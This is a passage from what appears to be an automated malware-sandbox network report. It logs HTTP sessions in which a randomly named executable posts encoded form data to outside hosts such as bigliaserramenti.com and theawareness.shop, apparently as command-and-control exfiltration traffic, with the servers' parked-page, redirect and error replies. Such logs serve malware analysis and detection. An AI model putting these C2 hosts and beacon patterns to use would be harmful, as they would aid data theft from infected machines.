                                                                                                                                                                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                                                                                                                                                                                                        Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"Open Sans",Helvetica,sans-serif;color:#000;padding:0;
                                                                                                                                                                                                                        Oct 23, 2024 18:55:54.297506094 CEST1289INData Raw: 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 30 2e 37 64 65 67 2c 23 65 39 65 64 66 62 20 2d 35 30 2e 32 31 25 2c 23 66 36 66
                                                                                                                                                                                                                        Data Ascii: margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600!important;color:#333}h2{font-size:24px;font-weight:6
                                                                                                                                                                                                                        Oct 23, 2024 18:55:54.297565937 CEST1289INData Raw: 33 65 61 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 20 69 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 2d 62 61 72 20 69 6d 67 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 74
                                                                                                                                                                                                                        Data Ascii: 3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-container{display:flex;flex-direction:row}.message-subtitle{color:#2f1c6a;font-weight:700;font-size:24px;li
                                                                                                                                                                                                                        Oct 23, 2024 18:55:54.297621965 CEST1289INData Raw: 69 7a 65 3a 31 32 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 36 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 32 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 32 30 70 78 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 74 65 78
                                                                                                                                                                                                                        Data Ascii: ize:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-align:center;display:inline-block;padding:4px 8px;font-weight:700;border-radius:4px;background-color:#fc5185}@media screen and (max-width:768px){.message{width
                                                                                                                                                                                                                        Oct 23, 2024 18:55:54.297667027 CEST1289INData Raw: 72 69 61 6c 73 20 72 65 6c 3d 6e 6f 66 6f 6c 6c 6f 77 3e 3c 69 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 74 72 75 65 20 63 6c 61 73 73 3d 22 66 61 73 20 66 61 2d 67 72 61 64 75 61 74 69 6f 6e 2d 63 61 70 22 3e 3c 2f 69 3e 20 54 75 74 6f 72 69 61 6c
                                                                                                                                                                                                                        Data Ascii: rials rel=nofollow><i aria-hidden=true class="fas fa-graduation-cap"></i> Tutorials</a></li><li><a href=https://support.hostinger.com/en/ rel=nofollow><i aria-hidden=true class="fa-readme fab"></i>Knowledge base</a></li><li><a href=https://www
                                                                                                                                                                                                                        Oct 23, 2024 18:55:54.297708988 CEST1289INData Raw: 20 68 6f 73 74 69 6e 67 20 66 6f 72 20 79 6f 75 72 20 73 75 63 63 65 73 73 66 75 6c 20 6f 6e 6c 69 6e 65 20 70 72 6f 6a 65 63 74 73 2e 3c 2f 70 3e 3c 62 72 3e 3c 61 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 6f 73 74 69 6e 67 65 72
                                                                                                                                                                                                                        Data Ascii: hosting for your successful online projects.</p><br><a href=https://www.hostinger.com rel=nofollow>Find your hosting plan</a></div></div><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-title>Add w
                                                                                                                                                                                                                        Oct 23, 2024 18:55:54.297749996 CEST1289INData Raw: 5b 5d 2c 6e 3d 30 2c 74 3d 6f 2e 6c 65 6e 67 74 68 3b 6e 3c 74 3b 29 7b 69 66 28 35 35 32 39 36 3d 3d 28 36 33 34 38 38 26 28 72 3d 6f 5b 6e 2b 2b 5d 29 29 29 74 68 72 6f 77 20 6e 65 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 55 54 46 2d 31 36 28
                                                                                                                                                                                                                        Data Ascii: [],n=0,t=o.length;n<t;){if(55296==(63488&(r=o[n++])))throw new RangeError("UTF-16(encode): Illegal UTF-16 value");65535<r&&(r-=65536,e.push(String.fromCharCode(r>>>10&1023|55296)),r=56320|1023&r),e.push(String.fromCharCode(r))}return e.join(""
                                                                                                                                                                                                                        Oct 23, 2024 18:55:54.297805071 CEST1289INData Raw: 69 63 65 28 66 2c 30 2c 61 29 2c 66 2b 2b 7d 69 66 28 74 29 66 6f 72 28 66 3d 30 2c 77 3d 6d 2e 6c 65 6e 67 74 68 3b 66 3c 77 3b 66 2b 2b 29 79 5b 66 5d 26 26 28 6d 5b 66 5d 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6d 5b 66
                                                                                                                                                                                                                        Data Ascii: ice(f,0,a),f++}if(t)for(f=0,w=m.length;f<w;f++)y[f]&&(m[f]=String.fromCharCode(m[f]).toUpperCase().charCodeAt(0));return this.utf16.encode(m)},this.encode=function(t,a){var h,f,i,c,u,d,l,p,g,s,C,w;a&&(w=this.utf16.decode(t));var v=(t=this.utf1
                                                                                                                                                                                                                        Oct 23, 2024 18:55:54.297838926 CEST100INData Raw: 2c 61 63 63 6f 75 6e 74 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 70 61 74 68 4e 61 6d 65 22 29 3b 61 63 63 6f 75 6e 74 2e 69 6e 6e 65 72 48 54 4d 4c 3d 70 75 6e 79 63 6f 64 65 2e 54 6f 55 6e 69 63 6f 64 65 28
                                                                                                                                                                                                                        Data Ascii: ,account=document.getElementById("pathName");account.innerHTML=punycode.ToUnicode(pathName)</script>


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        37192.168.11.204982975.2.19.62805492C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:55:59.659310102 CEST829OUTPOST /ygv5/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.bigliaserramenti.com
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.bigliaserramenti.com
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 202
                                                                                                                                                                                                                        Referer: http://www.bigliaserramenti.com/ygv5/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Raw: 32 72 75 6c 2d 3d 76 56 30 56 56 30 6c 4e 54 4c 4b 33 76 51 37 35 35 77 39 75 6f 46 62 46 45 4d 54 2b 55 56 6b 34 39 41 61 75 5a 30 4c 64 6a 65 78 62 72 54 50 75 6e 6d 42 47 72 31 72 48 38 62 64 38 50 53 6f 41 5a 75 38 44 41 76 33 4f 76 52 56 4c 57 65 51 6f 43 6b 45 58 58 4c 6d 4d 6c 74 48 34 61 51 62 6a 37 65 36 4a 6e 32 44 4d 79 7a 4d 58 62 78 6f 56 6b 37 65 70 4f 6a 6c 68 50 4a 6e 4c 48 55 36 32 38 47 6d 41 2b 63 78 5a 6f 7a 35 45 63 37 49 31 4c 51 5a 64 31 66 44 4d 36 76 50 6f 50 69 75 6d 77 4d 67 53 72 2b 72 43 72 4a 62 45 53 61 62 6b 4e 74 58 30 78 36 77 6e 4b 66 6c 65 33 58 4b 2f 35 41 3d 3d
                                                                                                                                                                                                                        Data Ascii: 2rul-=vV0VV0lNTLK3vQ755w9uoFbFEMT+UVk49AauZ0LdjexbrTPunmBGr1rH8bd8PSoAZu8DAv3OvRVLWeQoCkEXXLmMltH4aQbj7e6Jn2DMyzMXbxoVk7epOjlhPJnLHU628GmA+cxZoz5Ec7I1LQZd1fDM6vPoPiumwMgSr+rCrJbESabkNtX0x6wnKfle3XK/5A==


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        38192.168.11.204983075.2.19.62805492C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:56:02.284226894 CEST849OUTPOST /ygv5/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.bigliaserramenti.com
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.bigliaserramenti.com
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 222
                                                                                                                                                                                                                        Referer: http://www.bigliaserramenti.com/ygv5/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Raw: 32 72 75 6c 2d 3d 76 56 30 56 56 30 6c 4e 54 4c 4b 33 75 78 72 35 32 33 70 75 35 6c 62 4b 64 73 54 2b 66 31 6b 38 39 41 6d 75 5a 32 6d 59 6a 4d 6c 62 71 79 2f 75 68 58 42 47 6f 31 72 48 7a 37 63 32 51 69 70 4d 5a 75 41 4c 41 72 33 4f 76 52 70 4c 57 61 41 6f 44 54 51 55 58 62 6d 43 2b 64 48 36 58 77 62 6a 37 65 36 4a 6e 32 58 6d 79 7a 55 58 63 41 59 56 6b 61 65 75 44 44 6c 69 43 5a 6e 4c 4e 30 37 65 38 47 6e 6c 2b 64 74 6a 6f 78 52 45 63 35 51 31 4c 42 5a 65 37 76 43 48 30 50 4f 34 47 32 6a 72 78 38 6f 57 37 4d 62 5a 79 49 6a 73 54 4d 57 2b 51 66 6a 51 79 70 73 56 4f 76 63 32 31 56 4c 6b 6b 4b 52 49 6f 6f 47 56 30 56 4f 7a 6f 62 6a 4c 6d 6a 6d 32 57 65 51 3d
                                                                                                                                                                                                                        Data Ascii: 2rul-=vV0VV0lNTLK3uxr523pu5lbKdsT+f1k89AmuZ2mYjMlbqy/uhXBGo1rHz7c2QipMZuALAr3OvRpLWaAoDTQUXbmC+dH6Xwbj7e6Jn2XmyzUXcAYVkaeuDDliCZnLN07e8Gnl+dtjoxREc5Q1LBZe7vCH0PO4G2jrx8oW7MbZyIjsTMW+QfjQypsVOvc21VLkkKRIooGV0VOzobjLmjm2WeQ=


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        39192.168.11.204983175.2.19.62805492C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:56:04.911489964 CEST1289OUTPOST /ygv5/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.bigliaserramenti.com
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.bigliaserramenti.com
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 7370
                                                                                                                                                                                                                        Referer: http://www.bigliaserramenti.com/ygv5/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Raw: 32 72 75 6c 2d 3d 76 56 30 56 56 30 6c 4e 54 4c 4b 33 75 78 72 35 32 33 70 75 35 6c 62 4b 64 73 54 2b 66 31 6b 38 39 41 6d 75 5a 32 6d 59 6a 4e 64 62 71 41 33 75 6e 45 5a 47 70 31 72 48 36 62 63 31 51 69 6f 57 5a 75 59 50 41 71 4c 30 76 55 6c 4c 58 39 6f 6f 53 52 6f 55 59 62 6d 43 68 74 48 2f 61 51 62 36 37 65 71 4e 6e 32 48 6d 79 7a 55 58 63 44 41 56 74 72 65 75 42 44 6c 68 50 4a 6e 58 48 55 36 7a 38 47 50 66 2b 64 70 4a 30 52 78 45 63 5a 41 31 59 6a 78 65 39 2f 43 46 35 76 50 39 47 78 71 72 78 34 4a 76 37 50 48 6a 79 4c 54 73 54 72 76 67 44 2f 71 49 74 72 63 41 48 4e 51 4d 6a 6b 4c 54 6a 49 56 68 75 6f 6d 4c 33 6a 79 68 73 37 62 74 79 47 32 55 4f 34 36 46 37 49 35 32 63 76 45 78 43 77 71 33 4b 41 75 4c 66 6d 61 63 57 46 76 2b 4a 54 54 52 55 38 6d 6f 58 72 66 50 57 73 6e 6f 7a 51 43 6c 38 61 57 6c 44 2f 54 69 5a 37 75 64 31 72 50 61 42 55 76 73 70 2f 78 6a 4a 78 4d 73 75 47 51 4e 6b 49 58 4d 75 77 54 4e 55 47 63 32 44 62 76 69 6e 64 32 35 42 6c 37 36 31 4f 6f 47 48 43 2f 2f 58 7a 45 33 34 4b 4e 32 [TRUNCATED]
                                                                                                                                                                                                                        Data Ascii: 2rul-=vV0VV0lNTLK3uxr523pu5lbKdsT+f1k89AmuZ2mYjNdbqA3unEZGp1rH6bc1QioWZuYPAqL0vUlLX9ooSRoUYbmChtH/aQb67eqNn2HmyzUXcDAVtreuBDlhPJnXHU6z8GPf+dpJ0RxEcZA1Yjxe9/CF5vP9Gxqrx4Jv7PHjyLTsTrvgD/qItrcAHNQMjkLTjIVhuomL3jyhs7btyG2UO46F7I52cvExCwq3KAuLfmacWFv+JTTRU8moXrfPWsnozQCl8aWlD/TiZ7ud1rPaBUvsp/xjJxMsuGQNkIXMuwTNUGc2Dbvind25Bl761OoGHC//XzE34KN29IsTlelJnZT1VdWjZzNfTr5GSBU0mWp58KVIyX3S70bjOZOg+eUXqONGkdkZfeTgSi3DzEzkTAidjFRk+guozthPnnnWbHKB9/Ns4C5Z4jZwDfFsS26/kho8+7bZZEhHL9GCcJzoBsTrSjZviRbY1LNRrtVSPnwwqUy0td3DJfEl2DdlQbQl0m20GY0HJuo1AW/cgEybkZcLPmj1VlKJLW3wmawgkbHtL64YkxKzIk+IaWu+hwZKx1UtmIdcG1F65AflcjKW75uIIuhIqRh45BsMXJv6RryPFhrv3ClMjnWf+qVv3GWKyQGzhOWrejeEA0S
                                                                                                                                                                                                                        Oct 23, 2024 18:56:04.911542892 CEST3867OUTData Raw: 59 71 38 79 45 43 69 43 68 52 41 35 76 6b 59 6d 72 6e 45 34 64 45 6b 63 36 2f 46 6b 77 69 55 44 57 2f 46 74 2f 50 38 62 36 72 4a 35 2b 66 56 41 41 62 55 63 2f 61 48 50 33 35 78 4f 78 64 49 67 34 74 2f 6d 6a 52 72 49 39 6c 36 4c 64 43 63 36 61 67
                                                                                                                                                                                                                        Data Ascii: Yq8yECiChRA5vkYmrnE4dEkc6/FkwiUDW/Ft/P8b6rJ5+fVAAbUc/aHP35xOxdIg4t/mjRrI9l6LdCc6agJiKp+pivdeoyiKSkA7SZkOZwECcAKHsjbpfa9GPZIdEOHCmhP+gUDiwWjRyFYMvG1lIxx4Jzkkgb05PkW3xJUXSZ3oBlK6llDydHvRF7mRYAzVL5xL+BuYGkrAiKMoQzDOFJEqLspQIx8xApcvwU1dyzReF+B8tY7
                                                                                                                                                                                                                        Oct 23, 2024 18:56:04.911597013 CEST2842OUTData Raw: 42 41 59 78 46 68 62 6f 52 4c 62 55 54 39 2b 4f 6a 67 6b 69 30 2f 74 42 59 47 6e 70 47 4b 61 74 4f 31 4b 57 66 6c 37 48 73 50 44 6b 70 7a 54 68 79 49 38 38 56 58 36 46 2f 5a 79 4a 65 7a 6b 4b 65 38 6d 30 36 75 77 41 64 6a 78 2b 74 71 39 74 78 52
                                                                                                                                                                                                                        Data Ascii: BAYxFhboRLbUT9+Ojgki0/tBYGnpGKatO1KWfl7HsPDkpzThyI88VX6F/ZyJezkKe8m06uwAdjx+tq9txRXeszBd8GEDYAHxN3yW4divtOhZW+aLCR1XPDN2jTNcmRqQyJT4r8V7n8KKfzxcbwizfvU7csx2mYlZTfWFaI/P/BbuTr2501UYxuWj4Hv7lPcPoYHQ942q15ePrRPUar9czaLySEMiQpYwCj/kW7WkMB8P4kFWVDc


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        40192.168.11.204983275.2.19.62805492C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:56:07.535723925 CEST542OUTGET /ygv5/?Hh=g6BlO&2rul-=iXc1WEJQd/Gahx7+3W11/RKNDsT+DV4H4y6OEj3K8d5Enxayz0VfmTOd+atgJRAuX8UuGK7zkF0xfNQrHCEKQuis9q2uRBiLjPiUjFzh2kkhFDo8hKapbBo= HTTP/1.1
                                                                                                                                                                                                                        Host: www.bigliaserramenti.com
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Oct 23, 2024 18:56:07.689454079 CEST390INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Server: openresty
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:56:07 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Content-Length: 250
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 48 68 3d 67 36 42 6c 4f 26 32 72 75 6c 2d 3d 69 58 63 31 57 45 4a 51 64 2f 47 61 68 78 37 2b 33 57 31 31 2f 52 4b 4e 44 73 54 2b 44 56 34 48 34 79 36 4f 45 6a 33 4b 38 64 35 45 6e 78 61 79 7a 30 56 66 6d 54 4f 64 2b 61 74 67 4a 52 41 75 58 38 55 75 47 4b 37 7a 6b 46 30 78 66 4e 51 72 48 43 45 4b 51 75 69 73 39 71 32 75 52 42 69 4c 6a 50 69 55 6a 46 7a 68 32 6b 6b 68 46 44 6f 38 68 4b 61 70 62 42 6f 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Hh=g6BlO&2rul-=iXc1WEJQd/Gahx7+3W11/RKNDsT+DV4H4y6OEj3K8d5Enxayz0VfmTOd+atgJRAuX8UuGK7zkF0xfNQrHCEKQuis9q2uRBiLjPiUjFzh2kkhFDo8hKapbBo="}</script></head></html>


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        41192.168.11.2049833172.67.177.220805492C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:56:12.907430887 CEST820OUTPOST /wjz2/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.theawareness.shop
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.theawareness.shop
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 202
                                                                                                                                                                                                                        Referer: http://www.theawareness.shop/wjz2/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Raw: 32 72 75 6c 2d 3d 55 63 57 6e 71 61 5a 35 35 50 65 51 7a 49 73 4b 36 71 6e 71 63 6e 70 30 39 4b 36 6d 70 2b 73 32 77 2f 30 4b 70 6a 74 6c 54 70 6a 6b 71 42 4e 4c 4c 65 6b 4f 31 6f 49 57 50 35 4c 6a 41 61 47 64 41 72 65 49 66 55 39 49 77 5a 38 4f 53 67 6c 62 50 6d 38 70 75 52 4d 53 45 54 6c 46 79 51 58 74 6f 35 72 62 52 55 58 59 71 45 67 34 31 73 70 58 48 33 6c 57 6f 44 77 31 75 6a 41 77 62 41 2b 38 51 50 4e 75 2b 52 66 50 4e 32 75 36 6d 6e 70 68 54 73 42 58 39 67 35 55 46 65 42 5a 42 6f 59 41 49 69 72 72 6a 75 43 6b 41 45 6a 4c 58 6f 6d 67 6e 4d 4c 77 35 6f 49 45 49 4a 79 67 62 4e 66 6f 30 51 3d 3d
                                                                                                                                                                                                                        Data Ascii: 2rul-=UcWnqaZ55PeQzIsK6qnqcnp09K6mp+s2w/0KpjtlTpjkqBNLLekO1oIWP5LjAaGdAreIfU9IwZ8OSglbPm8puRMSETlFyQXto5rbRUXYqEg41spXH3lWoDw1ujAwbA+8QPNu+RfPN2u6mnphTsBX9g5UFeBZBoYAIirrjuCkAEjLXomgnMLw5oIEIJygbNfo0Q==
                                                                                                                                                                                                                        Oct 23, 2024 18:56:13.194932938 CEST1289INHTTP/1.1 502 Bad Gateway
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:56:13 GMT
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                        Content-Length: 6366
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0QyS5xAQHynTOM8A4bCxq0rDAAFvi%2B%2FqNC7Ds7L6%2BdZYX0WkuMrZrjaoJ6wzQyZOltdwyiT50Xw4poQaYdnDByTeUA4ojWMIuWnbuFNTAQi8u5yoHEEYYNrWB7VRvZTpSsJf2Iarmx8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                        Referrer-Policy: same-origin
                                                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                        CF-RAY: 8d734258f9ec43b6-EWR
                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=94974&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=820&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
